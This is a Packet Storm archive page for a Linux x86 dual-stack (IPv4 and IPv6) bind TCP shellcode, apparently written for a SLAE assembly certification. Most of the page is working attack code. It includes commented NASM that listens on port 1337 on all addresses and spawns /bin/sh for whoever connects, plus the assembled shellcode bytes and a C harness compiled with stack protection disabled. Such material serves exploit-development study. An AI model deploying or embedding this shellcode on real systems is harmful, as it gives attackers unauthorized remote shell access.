Twenty Year Anniversary

Linux/x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode

Linux/x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
Posted Aug 31, 2018
Authored by Kevin Kirsche

Linux/x86 dual network stack (IPv4 and IPv6) bind TCP shellcode.

tags | x86, tcp, shellcode
systems | linux
MD5 | 0dd1f19482e4deabce127fe130413c4a

Linux/x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode

Change Mirror Download
/*
# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
# Date: 2018-08-18
# Shellcode Author: Kevin Kirsche
# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell
# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2

# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh

This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134

Compilation instructions:
gcc -o shellcode shellcode.c -fno-stack-protector -z execstack

Commented NASM:
global _start

section .text

_start:
; socket
;; cleanup
xor ebx, ebx
;; arguments
push ebx ; #define IP_PROTO 0
push 0x1 ; #define SOCK_STREAM 1
push 0xa ; #define PF_INET6 10
;; function
mov ecx, esp ; pointer to args on the stack into ecx
push 0x66
pop eax ; socketcall 0x66 == 102
inc ebx ; #define SYS_SOCKET 1
;; call
int 0x80
;; returned data
xchg esi, eax ; sockfd eax -> esi

; setsocketopt
;; cleanup
xor eax, eax
;; arguments
push eax ; NO = 0x0
mov edx, esp ; get a pointer to the null value
push 0x2 ; sizeof(NO)
push edx ; pointer to NO
push 0x1a ; #define IPV6_V6ONLY 26
push 0x29 ; #define IPPROTO_IPV6
;; function
mov ecx, esp ; pointer to args on the stack into ecx
mov al, 0x66 ; socketcall 0x66 == 102
mov bl, 0xe ; #define SYS_SETSOCKOPT 14
;; call
int 0x80

; bind ipv4
;; cleanup
xor edx, edx
;; v4lhost struct
push edx ; #define INADDR_ANY 0
push word 0x3905 ; port 1337 in big endian format
push 0x2 ; #define AF_INET 2
;; arguments
mov ecx, esp ; pointer to v4lhost struct arguments
push 0x10 ; sizeof v4lhost
push ecx ; pointer v4lhost
push esi ; push sockfd onto stack
;; function
mov ecx, esp ; argument pointer into ecx
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

; bind ipv6
;; cleanup
xor eax, eax
;; v6lhost struct
push dword eax ; v6_host.sin6_addr
push dword eax
push dword eax
push dword eax
push dword eax
push word 0x3905 ; port 1337
push word 0x0a ; PF_INET6
;; arguments
mov ecx, esp ; pointer to struct into ecx
push 0x1c ; sizeof struct
push ecx ; pointer to struct
push esi ; sockfd
;; function
mov ecx, esp ; arguments into register
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

; listen
;; arguments
push byte 0x2 ; queuelimit = 2
push esi ; sockfd
;; function
mov ecx, esp ; pointer to args into ecx
mov bl, 0x4 ; #define SYS_LISTEN 4
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

; accept
;; cleanup
xor ebx, ebx
;;arguments
push ebx ; push NULL
push ebx ; push NULL
push esi ; sockfd
;; function
mov ecx, esp ; pointer to args into ecx
mov bl, 0x5 ; #define SYS_ACCEPT 5
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80
;; returned data
xchg ebx, eax ; ebx holds the new sockfd that we accepted

; dup file descriptor
;; setup counters
sub ecx, ecx ; zero out ecx
mov cl, 0x2 ; create a counter
;; loop
duploop:
mov al, 0x3f ; SYS_DUP2 syscall
int 0x80 ; call SYS_DUP2
dec ecx ; decrement loop counter
jns duploop ; as long as SF is not set, keep looping

; execve
;; cleanup
xor edx, edx
;; command to run
push edx ; NULL string terminator
push 0x68732f2f ; hs//
push 0x6e69622f ; nib/
;; arguments
mov ebx, esp ; pointer to args into ebx
push edx ; null ARGV
push ebx ; command to run
;; function
mov ecx, esp
mov al, 0x0b ; execve systemcall
int 0x80
*/
#include <stdio.h>
#include <string.h>

unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43"
"\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0"
"\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66"
"\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66"
"\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49"
"\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\x89\xe1\xb0\x0b\xcd\x80";


int main() {
// pollute the registers
asm("mov $0x78975432, %eax\n\t"
"mov $0x17645589, %ecx\n\t"
"mov $0x23149875, %edx\n\t");

// begin shellcode
printf("Shellcode Length: %d\n", strlen(code));
// execute our shellcode
int (*ret)() = (int(*)())code;
ret();
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    1 Files
  • 18
    Nov 18th
    1 Files
  • 19
    Nov 19th
    3 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close